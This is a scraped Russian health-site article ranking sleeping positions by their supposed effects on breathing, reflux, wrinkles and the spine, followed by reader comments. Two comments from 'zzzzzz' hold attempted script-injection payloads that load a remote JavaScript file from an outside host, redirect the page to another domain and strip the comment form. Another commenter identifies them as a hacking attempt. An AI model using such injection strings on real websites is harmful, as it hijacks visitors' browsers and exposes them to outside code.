Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как правильно спать  >>  Как правильно спать
 
Обратная связь
 

Как правильно спать

Размер шрифта
28 апреля 2014 00:00
  • google_analytics: false
  • Нравится

Оказывается, поза, в которой вы спите ночью, может влиять на ваше самочувствие днем! В каких же позах спать?

Как правильно спать

Лучший вариант – на спине

Положение на спине гарантирует хорошую циркуляцию крови в мозге, комфортно для шеи и спины, препятствует рефлюксу желудочного содержимого в пищевод. На лице образуется меньше морщин, так как ничто не касается кожи лица ночью, сон на спине также способствует красоте груди. Однако такая позиция не для тех, кто храпит: корень языка может западать, вызывая храп.

Хороший вариант – на боку

Как правильно спать

Особенно – на левой стороне тела! Это предупреждает храп и желудочный рефлюкс, а также облегчает работу сердца. Особенно хороша эта поза для беременных, которым не рекомендуют спать на спине. Увы, привет морщинам и обвисшей груди – виной всему подушка и сила тяжести.

Плохой вариант – в позе эмбриона

Как правильно спать

Возможно, спать в позе эмбриона очень уютно, однако она ограничивает дыхательные движения, и также вызывает сдавление внутренних органов. Так же, как и сон на боку, сон в позе эмбриона способствует возникновению морщин и обвисанию груди. Кроме того, регулярный сон в позе эмбриона оказывает неблагоприятное действие на позвоночник.

Худший вариант – на животе

Как правильно спать

8 часов на животе способствуют уплощению естественных изгибов позвоночника. Кроме того, ваши голова и шея остаются повернутыми в течение всей ночи. Даже несколько минут в такой позиции, пока вы бодрствуете, могут вызвать дискомфорт, что говорить о 8 часах! Кроме того, эта позиция вредна для суставов и мышц. Читайте больше в нашем спецпроекте «Сон без храпа».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - konyushina

28 апреля 2014 в 18:47

Цитировать   |   Пожаловаться

Вот оно оказывается как... на животе спать плохо(

2 - zzzzzz

30 июня 2015 в 18:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

4 - Гость

17 октября 2016 в 17:21

Цитировать   |   Пожаловаться

zzzzzz 30 июня 2015 в 22:39
попытка взлома
 Пшёл вон, недохакер!

Статьи

       
Храп вызывает смертельное заболевание легких! Сколько храпеть вредно?   Храпящие люди в 3 раза чаще разбиваются на машинах! Как этого избежать   Муж храпит? Спасайте его – он глупеет!   Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!  
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 15 июля 2013Сколько нужно спать, чтобы помнить все
 
11 июля 2013Ворочаетесь по ночам? У вас в два раза больше шансов умереть раньше! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Как спать с бронхитом
Почему вы не можете выспаться. Часть 2
Как провести день, чтобы выспаться

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.